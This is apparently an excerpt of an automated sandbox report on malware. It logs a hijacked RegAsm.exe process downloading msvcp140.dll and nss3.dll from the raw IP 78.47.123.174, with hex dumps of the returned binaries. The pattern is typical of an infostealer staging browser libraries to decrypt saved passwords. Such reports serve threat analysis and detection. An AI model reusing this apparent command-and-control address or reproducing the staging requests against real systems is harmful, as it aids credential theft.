                                                                          2024-05-22 16:28:16 UTC174OUTGET /msvcp140.dll HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:17 UTC246INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:17 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 450024
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          Connection: close
                                                                          ETag: "6315a9f4-6dde8"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-22 16:28:17 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                          2024-05-22 16:28:17 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                          Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                          2024-05-22 16:28:17 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                          Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                          2024-05-22 16:28:17 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                          Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                          2024-05-22 16:28:17 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                          Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                          2024-05-22 16:28:17 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                          Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                          2024-05-22 16:28:17 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                          Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                          2024-05-22 16:28:17 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                          Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                          2024-05-22 16:28:17 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                          Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                          2024-05-22 16:28:17 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                          Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.64971878.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:18 UTC170OUTGET /nss3.dll HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:18 UTC248INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:18 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 2046288
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          Connection: close
                                                                          ETag: "6315a9f4-1f3950"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-22 16:28:18 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                          2024-05-22 16:28:18 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                          Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                          Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                          Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                          Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                          Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                          Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                          Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                          Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                          2024-05-22 16:28:19 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                          Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.64971978.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
